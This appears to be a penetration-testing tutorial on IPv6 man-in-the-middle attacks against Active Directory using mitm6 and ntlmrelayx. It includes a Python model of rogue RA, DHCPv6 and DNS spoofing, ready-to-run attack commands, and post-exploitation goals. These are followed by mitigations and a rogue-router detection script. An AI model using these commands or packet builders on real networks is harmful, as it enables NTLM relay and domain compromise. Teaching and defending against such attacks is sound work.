IPv6 Attacks

Intro to IPv6

Internet Protocol Version 6 (IPv6) is the successor to IPv4. Its main selling point is a vastly larger address space, which removes the address exhaustion problem of IPv4. Although IPv4's limitations are well known, adoption of IPv6 has been slow: the shortage of IPv4 addresses was patched over with Network Address Translation (NAT), which made migration far less urgent.

Because NAT took the pressure off, many organizations never completed the move to IPv6. Many run a dual-stack setup in which hosts carry IPv4 and IPv6 addresses at the same time. That allows a gradual transition, but it adds complexity to network management and maintenance, and it often leaves IPv6 enabled on every host while nobody actually configures or monitors it.

IPv6 Attack

Most of the attacks below do not rely on a bug in IPv6 itself. They abuse the fact that hosts trust whatever Router Advertisements and DHCPv6 replies appear on the local link, on networks where IPv6 is enabled but not configured, filtered or monitored. Here are some examples of IPv6 attacks that can impact Windows Active Directory.

Neighbor Discovery Protocol (NDP) Attacks

Attackers can abuse the lack of authentication in NDP to perform Router Advertisement (RA) spoofing, Neighbor Solicitation (NS) flooding or Neighbor Cache poisoning. These attacks can disrupt connectivity, redirect traffic or impersonate legitimate network devices, which in turn affects any Active Directory communication that runs over the poisoned path.

Rogue Router Advertisements

Attackers can send rogue Router Advertisement (RA) messages on the link so that Windows hosts autoconfigure an attacker-chosen prefix, default gateway or DNS configuration (the RA's M flag also tells hosts to ask a DHCPv6 server, which the attacker can provide). This can lead to connectivity issues, DNS hijacking or man-in-the-middle attacks against Active Directory services.

Man-in-the-Middle (MITM) Attacks

IPv6 networks are susceptible to MITM attacks in which the attacker intercepts and manipulates traffic. Because a host accepts unauthenticated RAs and DHCPv6 replies, an attacker who becomes the host's IPv6 router or DNS server can eavesdrop on Active Directory communication, capture authentication material, or impersonate domain controllers and clients.

IPv6 Fragmentation Attacks

Attackers may use IPv6 fragmentation to evade detection or bypass security controls. By splitting a malicious payload, or an NDP message, across multiple fragments and extension-header chains that inspection devices do not reassemble, they can deliver content to Windows hosts in the Active Directory environment that an IDS or RA Guard would otherwise block, potentially leading to compromise or data exfiltration.

Denial-of-Service (DoS) Attacks

Attackers can launch IPv6-based DoS attacks against Windows Active Directory infrastructure by flooding the network with IPv6 traffic, for example RA floods that make every host configure thousands of addresses and routes. This overloads network devices, consumes CPU and memory on the victims, and disrupts normal Active Directory operations. It is rarely useful in a penetration test, but depending on the type of engagement and scenario it remains a real risk to the business.

All of the above attacks apply to Active Directory environments, and each has its own exploitation path and business impact. To keep things short and simple, I will showcase the MITM attack, which is widely used in Active Directory pentesting and can lead to full domain compromise.

MITMv6 or MITM6

As discussed above, IPv6 has its own flavour of man-in-the-middle attack, one that can capture sensitive information or impersonate domain controllers and clients. That is what we do here. Before we start, you may wonder: if IPv6 is not fully adopted, surely we rarely get to use this?

The answer is that you see this attack very often. Even on networks that only use IPv4, Windows has IPv6 enabled by default, and it prefers IPv6 over IPv4: its prefix policy ranks IPv6 destinations first, and a DNS server learned over DHCPv6 is queried ahead of the IPv4 ones. That is why this attack is so commonly used to compromise the domain, gain initial access, or capture NTLM authentication that can be relayed or cracked offline.

Now let's look at what happens behind the scenes in a mitm6 attack.

  • First we need the tool mitm6, a Python tool by Fox-IT; install it with `pip install mitm6` or clone it from its GitHub repository.

  • We start mitm6 on the attacker host. It periodically sends Router Advertisements with the M (managed) flag set and a router lifetime of 0, which tells hosts to obtain an address via DHCPv6 without using the attacker as default gateway. It then answers every DHCPv6 Solicit/Request with an IPv6 address and, crucially, the attacker's own address as DNS server, much like a rogue IPv4 DHCP server would. It deliberately does not hand out a default gateway, so the victim's normal IPv4 traffic keeps flowing and nothing looks broken.

  • The Windows host sends DHCPv6 requests to obtain its IPv6 configuration, mitm6 answers them, and from then on the victim sends its DNS queries to the attacker. Only DNS is redirected, not all traffic; that is enough, because mitm6 answers queries for names in the target domain (selected with `-d`) with the attacker's IPv6 address.

You may ask why Windows sends a DHCPv6 request to the attacker at all. Windows hosts periodically multicast DHCPv6 Solicit messages to ff02::1:2 by default, even when no IPv6 router exists on the segment, and the RAs that mitm6 sends prompt them to do so right away. Whoever answers first becomes the DHCPv6 server, and the host applies the address and DNS settings it receives.

Once the victim uses the attacker as DNS server, mitm6 answers queries for hosts in the target domain (and for the WPAD name) with the attacker's IPv6 address. The DNS query itself carries no credentials; those come next, when the victim connects to the attacker-controlled name over HTTP (for WPAD/proxy) or SMB and authenticates with NTLM.

mitm6 is paired with ntlmrelayx from Impacket, which relays that NTLM authentication to a domain controller over LDAP(S). For a normal user it automatically dumps domain information (users, groups, computers, policies) with ldapdomaindump, which is enough to map the domain and the victim's privileges for further exploitation. If the relayed user is an administrator, it can do far more damaging things.
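To make the exchange above concrete, here is an added example (written for this page; not mitm6's or Impacket's own code) that models the three messages with the Python standard library only: the Router Advertisement with the M flag and router lifetime 0, the DHCPv6 Advertise/Reply that pushes the attacker as DNS server, and the selective AAAA spoofing that only answers names inside the target domain. The MAC, addresses, DUIDs and the domain corp.local are made-up values, and packets are built as bytes but never sent, so it runs offline.

```python
"""Constructed model of the mitm6 exchange: RA -> DHCPv6 -> spoofed DNS.
Added example for this page, not mitm6's own code. The MAC, addresses,
DUIDs and the domain are made-up values; nothing is sent on the wire."""
import struct
import ipaddress

ATTACKER_MAC = bytes.fromhex("0250560000aa")                   # assumed
ATTACKER_IP6 = ipaddress.IPv6Address("fe80::50:56ff:fe00:aa")  # assumed
TARGET_DOMAIN = "corp.local"                                  # assumed (mitm6 -d)
SOLICIT, ADVERTISE, REQUEST, REPLY = 1, 2, 3, 7                # DHCPv6 msg types
OPT_CLIENTID, OPT_SERVERID, OPT_IA_NA, OPT_IAADDR, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 1, 2, 3, 5, 23, 24
QTYPE_AAAA = 28

def build_router_advertisement(m_flag=True, router_lifetime=0):
    """ICMPv6 RA (type 134). M flag: 'get config via DHCPv6'. Router lifetime 0:
    'I am not a default gateway', so the victim's other traffic stays untouched."""
    flags = 0x80 if m_flag else 0x00
    # type, code, checksum (0; the sending stack fills it), hop limit,
    # flags, router lifetime, reachable time, retrans timer
    return struct.pack("!BBHBBHII", 134, 0, 0, 64, flags, router_lifetime, 0, 0)

def dhcp6_opt(code, data):
    """DHCPv6 option TLV: code, length, value."""
    return struct.pack("!HH", code, len(data)) + data

def encode_dns_name(name):
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode() for lab in labels) + b"\x00"

def decode_dns_name(data, off):
    """Read an uncompressed DNS name; returns (name, offset after it)."""
    labels = []
    while data[off]:
        n = data[off]
        labels.append(data[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels), off + 1

def parse_dhcp6(msg):
    """Split a DHCPv6 message into (msg-type, transaction-id, {option: value})."""
    msg_type, xid, opts, off = msg[0], msg[1:4], {}, 4
    while off + 4 <= len(msg):
        code, length = struct.unpack("!HH", msg[off:off + 4])
        opts[code] = msg[off + 4:off + 4 + length]
        off += 4 + length
    return msg_type, xid, opts

def dhcp6_response(client_msg, assigned_addr):
    """Rogue server: Solicit -> Advertise, Request -> Reply. The part that
    matters is option 23 (DNS servers) carrying the attacker's own address."""
    msg_type, xid, opts = parse_dhcp6(client_msg)
    if msg_type not in (SOLICIT, REQUEST) or OPT_CLIENTID not in opts:
        return None
    iaid = opts[OPT_IA_NA][:4] if OPT_IA_NA in opts else b"\x00\x00\x00\x01"
    addr = ipaddress.IPv6Address(assigned_addr).packed
    ia_addr = dhcp6_opt(OPT_IAADDR, addr + struct.pack("!II", 300, 300))        # lifetimes
    ia_na = dhcp6_opt(OPT_IA_NA, iaid + struct.pack("!II", 200, 250) + ia_addr)  # T1, T2
    server_duid = struct.pack("!HH", 3, 1) + ATTACKER_MAC                        # DUID-LL
    return (bytes([ADVERTISE if msg_type == SOLICIT else REPLY]) + xid
            + dhcp6_opt(OPT_CLIENTID, opts[OPT_CLIENTID]) + dhcp6_opt(OPT_SERVERID, server_duid)
            + ia_na + dhcp6_opt(OPT_DNS_SERVERS, ATTACKER_IP6.packed)
            + dhcp6_opt(OPT_DOMAIN_LIST, encode_dns_name(TARGET_DOMAIN)))

def build_dns_query(name, qtype=QTYPE_AAAA, txid=b"\xab\xcd"):
    header = txid + struct.pack("!HHHHH", 0x0100, 1, 0, 0, 0)  # standard query, 1 question
    return header + encode_dns_name(name) + struct.pack("!HH", qtype, 1)

def spoof_dns_reply(query, target_domain=TARGET_DOMAIN):
    """Answer AAAA queries inside the target domain with the attacker's address.
    Anything else gets no reply, so the client falls back to its real resolver
    and nothing visibly breaks (real mitm6 applies more filters than this)."""
    qname, end = decode_dns_name(query, 12)
    qtype, _qclass = struct.unpack("!HH", query[end:end + 4])
    name = qname.lower()
    if qtype != QTYPE_AAAA or not (name == target_domain or name.endswith("." + target_domain)):
        return None
    header = query[:2] + struct.pack("!HHHHH", 0x8180, 1, 1, 0, 0)   # response, 1 answer
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_AAAA, 1, 60, 16) + ATTACKER_IP6.packed
    return header + query[12:end + 4] + answer

if __name__ == "__main__":
    # Constructed victim Solicit: DUID-LLT client id and one IA_NA.
    solicit = (bytes([SOLICIT]) + b"\x01\x02\x03"
               + dhcp6_opt(OPT_CLIENTID, bytes.fromhex("000100011c3900ab0050560000bb"))
               + dhcp6_opt(OPT_IA_NA, b"\x0e\x00\x00\x01" + bytes(8)))
    _, _, opts = parse_dhcp6(dhcp6_response(solicit, "fd00:dead:beef::1000"))
    print("DNS server pushed to the victim:", ipaddress.IPv6Address(opts[OPT_DNS_SERVERS]))
    reply = spoof_dns_reply(build_dns_query("dc01.corp.local"))
    print("dc01.corp.local AAAA ->", ipaddress.IPv6Address(reply[-16:]))
    print("www.example.com AAAA ->", spoof_dns_reply(build_dns_query("www.example.com")))
```

With the real tools the same flow is `mitm6 -d corp.local` in one terminal and `ntlmrelayx.py -6 -t ldaps://dc01.corp.local -wh attacker-wpad -l loot` in another. The point of the model is the two design choices that keep the victim's network working while its DNS is hijacked: no default route in the RA, and no answer for out-of-scope names.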

Below are the things an attacker can achieve if the relayed user is an Administrator.

  1. Privilege Escalation: With administrator-level access, the attacker can escalate their privileges on the compromised system. This allows them to bypass restrictions, access sensitive files, execute commands with elevated privileges, and make changes to system configurations.

  2. System Control: The attacker can take full control of the victim's system, installing, modifying, or removing software, creating user accounts, manipulating system settings, and executing arbitrary commands. They can effectively manipulate the compromised system as if they were the legitimate administrator.

  3. Network Access: As an administrator, the victim user likely has access to various network resources and sensitive information. The attacker can leverage this access to gain further control over network devices, access confidential data, or move laterally within the network to compromise additional systems.

  4. Active Directory Compromise: The attacker can use administrator privileges to target the Active Directory infrastructure. They can manipulate Active Directory objects, compromise domain controllers, create backdoors, modify group policies, or extract sensitive domain-related information.

  5. Data Exfiltration: With administrator access, the attacker can exfiltrate sensitive data from the victim's system or the network. They may steal valuable intellectual property, financial information, personal data, or other confidential information that can be used for malicious purposes or sold on the black market.

  6. Persistence: The attacker can establish persistence on the compromised system, ensuring continued access even if the initial compromise is detected or remediated. They can create hidden user accounts, install rootkits or backdoors, modify startup configurations, or deploy other techniques to maintain their presence on the system.

  7. Privileged Attacks: With administrator privileges, the attacker can perform more sophisticated attacks, such as privilege escalation within the network, compromising other administrative accounts, manipulating security controls, or disabling security mechanisms to evade detection.

Limitations

The attack path above is the dream scenario; in real life you may hit problems or get no results at all. To avoid rabbit holes, I recommend trying this attack only when you are sure the target environment has the following things enabled.

  • IPv6 enabled: IPv6 is the core of this attack; without it the attack is not possible. Since IPv6 is enabled by default on Windows, the attack is possible unless it has been explicitly disabled or RA/DHCPv6 traffic is blocked on the host.

  • Active Directory environment: this is a mandatory requirement. The relay targets LDAP on a domain controller, and the domain is what provides the large attack surface and the chance of a full compromise.

  • DNS resolution: the attack path is based on DNS. We poison the target's DNS settings to hijack its queries, so the target must actually resolve names in the target domain while our server is its resolver.

  • WPAD: the victim should have Web Proxy Auto-Discovery (WPAD) enabled, which is the Windows default. WPAD makes clients look up a host named wpad and fetch a proxy configuration from it; mitm6 resolves that name to the attacker, and ntlmrelayx serves a WPAD file that points to the attacker's proxy and then demands proxy authentication, which yields the NTLM authentication to relay. It is not strictly mandatory, since other connections to the attacker (for example SMB) can also be relayed, but having WPAD leads to good results.

  • Victim's user privileges: to get the maximum out of the attack, the relayed account should hold privileges in the domain, for example membership of Domain Admins or rights to modify Active Directory objects. Local administrator rights on the victim's own machine matter less, because the relay acts on the domain controller, not on the victim's host. With a privileged account the attacker can create accounts, grant themselves replication (DCSync) rights, or configure resource-based constrained delegation, which leads to domain compromise.

Mitigation

This attack can be mitigated in several ways; let's look at them.

  • Disable IPv6. Disabling IPv6 stops this attack completely, but Microsoft does not recommend turning it off outright, so if you cannot or do not want to, set the following built-in Windows Firewall rules to Block so that hosts neither accept rogue advertisements nor ask for DHCPv6 configuration:

(Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-In)
(Inbound) Core Networking - Router Advertisement (ICMPv6-In)
(Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-Out)
  • WPAD-related risk. The firewall rules above control the IPv6 side but do nothing against Web Proxy Auto-Discovery abuse. To close that, disable WPAD via Group Policy (turn off automatic proxy detection) and disable the WinHttpAutoProxySvc service if WPAD is not used in your environment.

  • LDAP(S)-related risk. I did not spell it out above, but the relay step depends on LDAP(S): ntlmrelayx relays NTLM authentication to the domain controller's LDAP service. Enforce LDAP signing (server requires signing) and LDAPS channel binding (Extended Protection for Authentication); a relayed session cannot produce a valid signature or channel binding token, so the relay fails.

  • Protected Users. Administrator accounts are the most sensitive, so add them (and other sensitive accounts) to the Protected Users security group. Members of that group cannot authenticate with NTLM at all, so there is nothing to relay; they also lose cached credentials, weak Kerberos encryption types and delegation, which is exactly what you want for administrators.
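The controls above are host-side and do not tell you whether someone is already playing router on a segment. A sensor that parses raw IPv6 packets is enough to spot it. This is an added example (not from the page or any product) and uses constructed sample traffic: one legitimate RA, one mitm6-style RA (M flag set, router lifetime 0), one DHCPv6 Advertise from the same unknown host, and a harmless client Solicit. The allowlist addresses are assumptions; in practice it is the inventory of real routers, and on an IPv4-only segment the DHCPv6 server allowlist is empty.

```python
"""Constructed sensor-side check for rogue IPv6 routers and DHCPv6 servers.
Added example for this page, not from any product. It parses raw IPv6
packets (no Ethernet header) and alerts on RA or DHCPv6 server messages
from sources that are not on the allowlist. Addresses are made up."""
import struct
import ipaddress

KNOWN_ROUTERS = {ipaddress.IPv6Address("fe80::1")}   # assumed inventory
KNOWN_DHCP6_SERVERS = set()                          # IPv4-only segment: none expected
NH_ICMPV6, NH_UDP, RA_TYPE, DHCP6_CLIENT_PORT = 58, 17, 134, 546
DHCP6_SERVER_MSGS = {2: "ADVERTISE", 7: "REPLY"}

def parse_ipv6(pkt):
    """Return (src, dst, next_header, payload) for a raw IPv6 packet."""
    if len(pkt) < 40:
        raise ValueError("not a well-formed IPv6 packet")
    ver_tc_fl, plen, nh, _hlim = struct.unpack("!IHBB", pkt[:8])
    if ver_tc_fl >> 28 != 6 or len(pkt) < 40 + plen:
        raise ValueError("not a well-formed IPv6 packet")
    src = ipaddress.IPv6Address(pkt[8:24])
    dst = ipaddress.IPv6Address(pkt[24:40])
    return src, dst, nh, pkt[40:40 + plen]

def inspect(pkt, known_routers=KNOWN_ROUTERS, known_dhcp6_servers=KNOWN_DHCP6_SERVERS):
    """Alerts for one packet; an empty list means it looked legitimate."""
    src, dst, nh, payload = parse_ipv6(pkt)
    alerts = []
    if nh == NH_ICMPV6 and len(payload) >= 16 and payload[0] == RA_TYPE:
        if src not in known_routers:
            flags, lifetime = payload[5], struct.unpack("!H", payload[6:8])[0]
            if flags & 0x80 and lifetime == 0:
                detail = "M flag set, router lifetime 0 (mitm6 signature: DHCPv6 only, no default route)"
            else:
                detail = f"flags=0x{flags:02x}, router lifetime {lifetime}s"
            alerts.append(f"rogue RA from {src}: {detail}")
    elif nh == NH_UDP and len(payload) >= 12:
        _sport, dport = struct.unpack("!HH", payload[:4])
        msg_type = payload[8]                       # DHCPv6 msg-type follows the 8-byte UDP header
        if dport == DHCP6_CLIENT_PORT and msg_type in DHCP6_SERVER_MSGS and src not in known_dhcp6_servers:
            alerts.append(f"unexpected DHCPv6 {DHCP6_SERVER_MSGS[msg_type]} from {src} to {dst}")
    return alerts

def scan(packets, known_routers=KNOWN_ROUTERS, known_dhcp6_servers=KNOWN_DHCP6_SERVERS):
    """Run inspect() over a capture; returns all alerts in packet order."""
    alerts = []
    for pkt in packets:
        alerts.extend(inspect(pkt, known_routers, known_dhcp6_servers))
    return alerts

def make_ipv6(src, dst, nh, payload):
    """Raw IPv6 packet for the sample capture (checksums left zero)."""
    hdr = struct.pack("!IHBB", 6 << 28, len(payload), nh, 255)
    return hdr + ipaddress.IPv6Address(src).packed + ipaddress.IPv6Address(dst).packed + payload

def sample_capture():
    """Constructed traffic: a legitimate RA, a mitm6-style RA, a DHCPv6 Advertise
    from the same unknown host, and a harmless client Solicit."""
    legit_ra = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0x00, 1800, 0, 0)
    rogue_ra = struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0x80, 0, 0, 0)
    advertise = struct.pack("!HHHH", 547, 546, 12, 0) + b"\x02\x01\x02\x03"  # UDP hdr + msg-type 2
    solicit = struct.pack("!HHHH", 546, 547, 12, 0) + b"\x01\x01\x02\x03"    # UDP hdr + msg-type 1
    return [
        make_ipv6("fe80::1", "ff02::1", NH_ICMPV6, legit_ra),
        make_ipv6("fe80::50:56ff:fe00:aa", "ff02::1", NH_ICMPV6, rogue_ra),
        make_ipv6("fe80::50:56ff:fe00:aa", "fe80::c0ff:ee", NH_UDP, advertise),
        make_ipv6("fe80::c0ff:ee", "ff02::1:2", NH_UDP, solicit),
    ]

if __name__ == "__main__":
    for alert in scan(sample_capture()):
        print("ALERT:", alert)
```

Feeding it a real capture means stripping the link-layer header first; the lifetime-0 plus M-flag combination is the tell for mitm6 specifically, while any RA or DHCPv6 server message from an address outside the inventory is worth an alert on its own.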
